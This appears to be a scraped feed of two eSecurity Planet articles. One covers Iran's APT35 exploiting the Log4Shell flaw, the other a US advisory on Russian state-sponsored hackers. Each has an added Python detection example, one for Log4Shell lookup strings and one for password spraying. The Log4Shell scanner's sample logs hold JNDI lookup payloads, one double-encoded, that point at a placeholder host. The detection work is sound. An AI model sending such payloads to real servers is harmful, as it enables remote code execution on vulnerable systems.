APT35 – also known as TA453, Phosphorus and Charming Kitten – was among a number of nation-state supported attack groups that were observed by threat intelligence units with Check Point, Microsoft and other vendors investigating ways to exploit the vulnerability just days after it became public Dec. 9.

“With the emergence of the Log4j security vulnerability, we’ve already seen multiple threat actors, mostly financially motivated, immediately add it to their exploitation arsenal,” the Check Point researchers wrote in a blog post this week. “It comes as no surprise that some nation-sponsored actors also saw this new vulnerability as an opportunity to strike before potential targets have identified and patched the affected systems.”

APT35 attack diagram: Check Point (figure)

Log4Shell a Significant Threat

The Log4j flaw – which also is known as Log4Shell and is tracked as CVE-2021-44228 – is a significant threat due to the broad enterprise use of Log4j and the huge number of servers and cloud-based services that could be exposed to the zero-day vulnerability. Log4j is a free and widely distributed open-source logging library from the Apache Software Foundation, and the flaw affects versions 2.0 through 2.14.1.

Security pros have said that the threat posed by Log4Shell is so high not only because of how far-reaching the tool’s use is but also because of how easily the vulnerability can be exploited. Threat actors only need to get a string containing a malicious lookup logged by Log4j; the library parses it and loads attacker-supplied code onto the server. Hackers can then gain control of the system running the software, creating a platform for launching their attacks.
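The detection side of the paragraph above, as an added example that is not code from Check Point, Oxeye or eSecurity Planet: a scanner that looks for JNDI lookup strings in web access logs after undoing URL-encoding, run over constructed log lines (EXAMPLE-C2 is a placeholder host).

```python
"""Hunt for Log4Shell lookup strings in web access logs.

Added example, not code from Check Point, Oxeye or eSecurity Planet; the
access-log lines are constructed. Vulnerable Log4j 2.x expands ${...} lookups
inside logged strings, so the check is: does any logged request field carry
a JNDI lookup once URL-encoding is undone?
"""
import re
from urllib.parse import unquote

# Direct JNDI lookup, matched case-insensitively on the decoded text
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def decode_fully(text, rounds=3):
    """Undo repeated URL-encoding. Payloads are often double-encoded to get
    past naive filters; a few rounds cover that without looping forever."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def is_suspicious(line):
    """True when the decoded line carries a ${jndi:...} lookup anywhere,
    including the URL path, query string, referrer or User-Agent."""
    return JNDI_RE.search(decode_fully(line)) is not None


# Constructed combined-format lines; EXAMPLE-C2 stands in for a real host
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Dec/2021:01:02:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:01:02:09 +0000] "GET /login HTTP/1.1" 200 77 "-" "${jndi:ldap://EXAMPLE-C2/a}"',
    '203.0.113.9 - - [10/Dec/2021:01:02:15 +0000] "GET /?q=%2524%257Bjndi%253Aldap%253A%252F%252FEXAMPLE-C2%252Fb%257D HTTP/1.1" 200 77 "-" "curl/7.68.0"',
    '198.51.100.3 - - [10/Dec/2021:01:03:00 +0000] "GET /docs?topic=jndi HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Return (line number, source address) for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        if is_suspicious(line):
            hits.append((n, line.split(" ", 1)[0]))
    return hits


if __name__ == "__main__":
    for n, src in scan(SAMPLE_ACCESS_LOG):
        print(f"line {n}: JNDI lookup in request from {src}")
```

Line 4 mentions "jndi" in a query parameter but has no lookup syntax, so it is not flagged; the decoded-text check is what catches the double-encoded request on line 3.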

A number of patches, detection tools and “vaccines” were released in the weeks after Log4Shell’s disclosure to address the problem. Cybersecurity firm Oxeye this week introduced Ox4Shell, a free open-source payload de-obfuscation tool designed to expose hidden payloads actively used by bad actors to confuse security tools and teams and avoid detection of their Log4Shell attacks. Ox4Shell, which officials said is the first in a series of planned solutions to push back against threats that exploit the Log4j flaw, is available on GitHub.

Also read: How Hackers Use Payloads to Take Over Your Machine

A Long-Term Security Problem

Despite these efforts, industry experts and government officials have said Log4Shell will continue to be a long-term problem. Jen Easterly, director of the federal Cybersecurity and Infrastructure Security Agency (CISA), reportedly said during a press conference that agency officials “expect Log4Shell to be used in intrusions well into the future.”

APT35’s PowerShell-based framework – dubbed CharmPower – is based on the JNDI Exploit Kit, which was removed from GitHub due to its skyrocketing popularity following the Log4Shell disclosure, according to Check Point. Attackers using the framework exploit a system by sending a crafted request to a victim’s public-facing device. Once exploited, the exploitation server creates and sends back a malicious Java class – which runs a PowerShell command – for execution on the vulnerable machine, which eventually downloads a PowerShell module.

The module communicates with the C&C server and executes the commands, including validating the network connection and receiving, decrypting and executing follow-up modules, Check Point researchers said.

They wrote that “the actor’s attack setup was obviously rushed, as they used the basic open-source tool for the exploitation and based their operations on previous infrastructure, which made the attack easier to detect and attribute.”

Also read: Best Incident Response Tools and Software

Government Cybersecurity Efforts

The Biden Administration and other government entities are working to mitigate the threats from Log4Shell and to try to ensure something similar can’t happen again. The White House on Jan. 13 was meeting with a range of tech companies, including Apple, Facebook’s parent company Meta, Microsoft and IBM, as well as federal agencies like Commerce, Defense, Homeland Security and CISA to talk about security and open-source software in the wake of the Log4j vulnerability.

During her meeting with journalists, Easterly said that CISA has been monitoring for threat actors trying to exploit Log4Shell and that “over the past several weeks we have seen widespread exploitation of Log4Shell by criminal actors who use it to install cryptomining software on victim computers or to capture victim computers for use in botnets.”

However, she said, “at this time we have not seen the use of Log4Shell resulting in significant intrusions. This may be the case because sophisticated adversaries have already used this vulnerability to exploit targets and are just waiting to leverage their access until network defenders are on lower alert.”

APT35 Efforts Show Real Threat of Flaw

However, Chris Morgan, senior cyberthreat intelligence analyst at digital risk protection solutions vendor Digital Shadows, said Check Point’s detection of APT35’s exploitation of Log4Shell conflicts with what Easterly and other CISA officials said about no significant intrusion being tied to the Log4j flaw.

“This likely emphasizes ongoing issues with incident disclosure and transparency and the lag that can exist between threat actor activity and discovery,” Morgan told eSecurity Planet, adding that as Easterly said, “Log4Shell will undoubtedly be featured heavily in threat actor campaigns for a considerable amount of time and the full scale of impact from Log4Shell will likely not be known for several months.”

He also noted that APT35 used the publicly available JNDI exploit kit that was published on – and since removed from – GitHub, which will probably ramp up debate regarding GitHub’s policy on proof-of-concept (PoC) exploit kits and malware samples hosted on the service.

“GitHub changed their policy in June 2021 to permit the removal of such items in order to minimize the risk of the exploits being used in live attacks,” Morgan said. “This decision originally was related to the removal of a PoC raised by a security researcher for the ProxyLogon Microsoft Exchange vulnerabilities, which was widely criticized by many in the security community.”

APT35 is a “live example of how a public exploit can fall into the wrong hands quickly,” he said. Check Point’s “findings may prove to be a justification of why their change in policy was a correct decision.”

The researchers wrote that whenever there is a new critical vulnerability published, the InfoSec community “holds its breath until its worst fears come true: scenarios of real-world exploitation, especially by state-sponsored actors. As we showed in this article, the wait in the case of the Log4j vulnerability was only a few days. The combination of its simplicity, and the widespread number of vulnerable devices, made this a very attractive vulnerability for actors such as APT35.”

They also noted that the threat actors used the same or similar infrastructure as in many of their previous attacks, but that given their ability to take advantage of the Log4j vulnerability and “the code pieces of the CharmPower backdoor, the actors are able to change gears rapidly and actively develop different implementations for each stage of their attacks.”

Read next: Top Vulnerability Management Tools


The post Iran-Based APT35 Group Exploits Log4J Flaw appeared first on eSecurity Planet.

]]>
U.S. Security Agencies Warn About Russian Threat Gangs Amid Ukraine Tensions https://www.esecurityplanet.com/threats/u-s-security-agencies-issue-russian-threat-alert/ Wed, 12 Jan 2022 20:38:28 +0000 https://www.esecurityplanet.com/?p=20514

]]>
U.S. federal security agencies are putting companies on alert to potential threats from Russian state-sponsored cybercriminal groups, warning in particular about dangers to critical infrastructure and urging organizations to learn how to detect and protect against attacks.

The joint cybersecurity advisory issued Jan. 11 by the FBI, National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) comes as tensions rise between Russia, the United States and European countries over Russia’s military activities related to Ukraine. The alert gives companies and agencies an overview of common tactics used by such Russia-based threat groups, lists of vulnerabilities they’ve been known to exploit and steps companies can take to detect, respond to and mitigate an attack.

“Historically, Russian state-sponsored advanced persistent threat (APT) actors have used common but effective tactics – including spearphishing, brute force, and exploiting known vulnerabilities against accounts and networks with weak security – to gain initial access to target networks,” the agencies wrote in the alert. “Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware.”

In addition, such groups have shown they can “maintain persistent, undetected, long-term access in compromised environments – including cloud environments – by using legitimate credentials,” they wrote. “In some cases, Russian state-sponsored cyber operations against critical infrastructure organizations have specifically targeted operational technology (OT)/industrial control systems (ICS) networks with destructive malware.”

Also read: Critical Infrastructure Protection: Physical and Cyber Security Both Matter

Russian Groups Behind High-Profile Attacks

Russian-backed groups have been behind some of the most significant recent cyberattacks, including the SolarWinds breach (Nobelium) and the ransomware attacks on Colonial Pipeline (DarkSide) and global meat supplier JBS (REvil).

Government agencies and the Biden administration also have taken steps to push back against Russia and the cybercriminal groups it’s accused of supporting. President Biden in July called on Russian President Vladimir Putin to stem ransomware and other cyberattacks from these gangs. In addition, the administration has taken other actions, from working with U.S. companies on their security posture to putting bounties on the more active and notorious threat actors.

Despite all this, the threat of the Russian gangs continues to hang over the United States and is unlikely to disappear anytime soon, according to Erich Kron, security awareness advocate at security training firm KnowBe4.

“Targeting critical infrastructure is nothing new,” Kron told eSecurity Planet. “However, the increased attacks are certainly something to be concerned with, especially given the tensions between the U.S. and Russia over the Ukraine border crisis. Russia has very advanced cyber warfare skills which keep them hidden once a network is compromised, although ironically, the initial attack vectors are typically those of low-tech email phishing campaigns, taking advantage of people reusing already compromised passwords or using easily guessed passwords.”

Also read: Best Password Managers & Tools

Tactics and Responses

In their alert, the agencies laid out a range of tactics used by the Russian-supported groups, including using large-scale scans to find vulnerable servers, compromising third-party software (like SolarWinds’ Orion software), password-guessing and password-spraying efforts and leveraging the credentials of existing accounts to ensure long-term and persistent access to compromised networks.

In addition, the agencies also outlined a number of steps to detect and protect against such attacks. Detection is critical, given the APT actors’ capabilities to maintain a long-term presence in compromised enterprise and cloud environments. They urged companies to implement strong and centralized log collection and retention programs and look for behavioral evidence or network- and host-based artifacts related to known Russian APT groups. This would include detecting password spray activity, checking authentication logs for system and application login failures of valid accounts, and detecting the use of compromised credentials.
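The password-spray and compromised-credential checks described above, as an added example that is not code from the agencies’ alert or from eSecurity Planet. The log format, addresses and user names are constructed; the spray signature it keys on is one source failing against many distinct accounts with few attempts each, followed by a successful login from that same source.

```python
"""Password-spray detection over authentication logs.

Added example, not code from the CISA/FBI/NSA alert or from eSecurity Planet.
The log format, source addresses and user names below are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
import re

# Constructed format: "<ISO timestamp> LOGIN_OK|LOGIN_FAIL user=<name> src=<ip>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<result>LOGIN_OK|LOGIN_FAIL) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

# Constructed sample: one spraying source that eventually succeeds as 'erin',
# one brute-force source hammering 'admin', and one ordinary user typo.
SAMPLE_LOG = """\
2022-01-11T09:00:01 LOGIN_FAIL user=alice src=203.0.113.7
2022-01-11T09:00:14 LOGIN_FAIL user=bob src=203.0.113.7
2022-01-11T09:00:29 LOGIN_FAIL user=carol src=203.0.113.7
2022-01-11T09:00:41 LOGIN_FAIL user=dave src=203.0.113.7
2022-01-11T09:00:55 LOGIN_FAIL user=erin src=203.0.113.7
2022-01-11T09:01:10 LOGIN_FAIL user=frank src=203.0.113.7
2022-01-11T09:03:02 LOGIN_OK user=erin src=203.0.113.7
2022-01-11T09:05:00 LOGIN_FAIL user=admin src=198.51.100.9
2022-01-11T09:05:02 LOGIN_FAIL user=admin src=198.51.100.9
2022-01-11T09:05:04 LOGIN_FAIL user=admin src=198.51.100.9
2022-01-11T09:05:06 LOGIN_FAIL user=admin src=198.51.100.9
2022-01-11T09:05:08 LOGIN_FAIL user=admin src=198.51.100.9
2022-01-11T09:10:00 LOGIN_FAIL user=grace src=192.0.2.44
2022-01-11T09:10:20 LOGIN_OK user=grace src=192.0.2.44
"""


@dataclass
class AuthEvent:
    ts: datetime
    ok: bool
    user: str
    src: str


def parse_log(text):
    """Parse log lines into AuthEvents, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            events.append(AuthEvent(datetime.fromisoformat(m["ts"]),
                                    m["result"] == "LOGIN_OK", m["user"], m["src"]))
    return events


def detect_spray(events, window=timedelta(minutes=30), min_users=5, max_per_user=2):
    """Sources that failed against many distinct accounts with few tries each
    inside one window. That is the spray signature; a brute force (many tries
    against one account) stays below min_users and above max_per_user."""
    fails_by_src = defaultdict(list)
    for e in events:
        if not e.ok:
            fails_by_src[e.src].append(e)
    findings = {}
    for src, fails in fails_by_src.items():
        fails.sort(key=lambda e: e.ts)
        for i, first in enumerate(fails):  # slide a window over the failures
            tries = defaultdict(int)
            for f in fails[i:]:
                if f.ts - first.ts > window:
                    break
                tries[f.user] += 1
            if len(tries) >= min_users and max(tries.values()) <= max_per_user:
                findings[src] = sorted(tries)
                break
    return findings


def successes_from_spraying_sources(events, sprays):
    """A valid-account login from a source that was spraying is the strongest
    sign the spray worked; those accounts are the ones to reset first."""
    hits = defaultdict(list)
    for e in events:
        if e.ok and e.src in sprays and e.user not in hits[e.src]:
            hits[e.src].append(e.user)
    return dict(hits)


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    sprays = detect_spray(evs)
    print("spraying sources:", sprays)
    print("likely compromised accounts:", successes_from_spraying_sources(evs, sprays))
```

The thresholds are starting points to tune against your own baseline of ordinary failed logins; the brute-force source is deliberately left to a separate rule, since its pattern (one account, many tries) is the opposite of a spray.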

There also was a list of responses companies should take if they’ve been compromised, including isolating affected systems and maintaining and securing backups. For mitigation, the recommendations include being prepared for such an attack, creating and maintaining cyber incident responses and resiliency plans and enhancing the security posture with tools like identity and access management (IAM) software and vulnerability and configuration solutions.

See also: Best Incident Response Tools and Software

Know the Enemy

The agencies also urged U.S. companies to become familiar with the tactics and targets of these APT groups.

“It’s important to remind ourselves that critical infrastructure is more than just a phrase,” Tim Erlin, vice president of strategy for cybersecurity firm Tripwire, told eSecurity Planet. “It describes a vast cross-section of infrastructure on which our nation relies. Critical infrastructure really is critical.”

The agencies’ alert contains both information about the threat and actionable information companies can use to protect themselves, such as the use of the MITRE ATT&CK framework for identifying malicious activity and mapping mitigation actions, Erlin said. “Identifying the attack in progress is important, but preventing the attack from being successful at all is better,” he said.

Also read: Best Ransomware Removal and Recovery Services

The Importance of Logs

Rick Holland, CISO and vice president of strategy at cybersecurity vendor Digital Shadows, told eSecurity Planet that a key message from the alert is the use of logs. When defending against any cybercriminal group, “you must have a security monitoring infrastructure that provides situational awareness to detect and respond to intrusions,” he said. “You must have sensors in place to capture malicious activity. You must also retain those logs for retroactive threat hunting as you develop and acquire new intelligence.”

It was also important for the alert to list the tactics used by the APT groups, Holland said.

“Although these groups have sophisticated capabilities, [such as the] SolarWinds intrusion, they also rely on low-hanging fruit tactics and techniques,” he said. “While it isn’t sexy, effective security hygiene like patching known vulnerabilities on external services raises the advisory costs and makes their job harder. Don’t be a soft target.”

See also: Best SIEM Tools & Software

Geopolitical Tensions

Holland echoed KnowBe4’s Kron regarding the threat of increased activity stemming from the tensions around Russia’s activities with Ukraine. Should the conflict escalate, the Russian-supported bad actors could also increase their operations.

“Cyberspace has become a key component of geopolitics,” he said. “Russian APT groups aren’t at the top of the threat model for all companies, unlike the critical infrastructure providers mentioned in the alert, but could end up being collateral damage.”

A Familiar Threat

Some cybersecurity professionals said the agencies’ security alert does little more than remind companies about the threat and to deliver information that they already should know.

Tim Wade, technical director and CTO at cybersecurity firm Vectra, told eSecurity Planet that he couldn’t “recall a time in my life when Russia wasn’t aggressively probing western resolve, ranging from tactical incursions into air space to pulling strategic economic levers. This activity is just a continuation of that long-standing tradition, and I read this advisory as another periodic reminder of the background radiation of global politics – if you’re operating critical infrastructure and are under the impression that you aren’t squarely in an operator’s crosshairs, you’re wrong.”

Tim Helming, security evangelist at threat intelligence company DomainTools, said the guidance in the alert is good, but that “it’s tempting to look at it as motherhood-and-apple-pie. The vast majority of owners and operators of critical infrastructure are well aware of the threats and are also cognizant of many of the fundamental steps toward hardening their assets against these threats. Many in the critical infrastructure community take an ‘assume breach.’”

Most companies and agencies already are using and improving the procedures and tools outlined in the alert, Helming told eSecurity Planet. CISA, the FBI and NSA likely issued the alert in part “because if they weren’t on record doing so and a compromise were confirmed, it would have been a glaring gap. It also gives owners and operators facing resource constraints more support in their requests and it’s important not to underestimate how important that can be.”

Further reading: Cybersecurity Outlook 2022: Third-Party, Ransomware and AI Attacks Will Get Worse


The post U.S. Security Agencies Warn About Russian Threat Gangs Amid Ukraine Tensions appeared first on eSecurity Planet.

]]>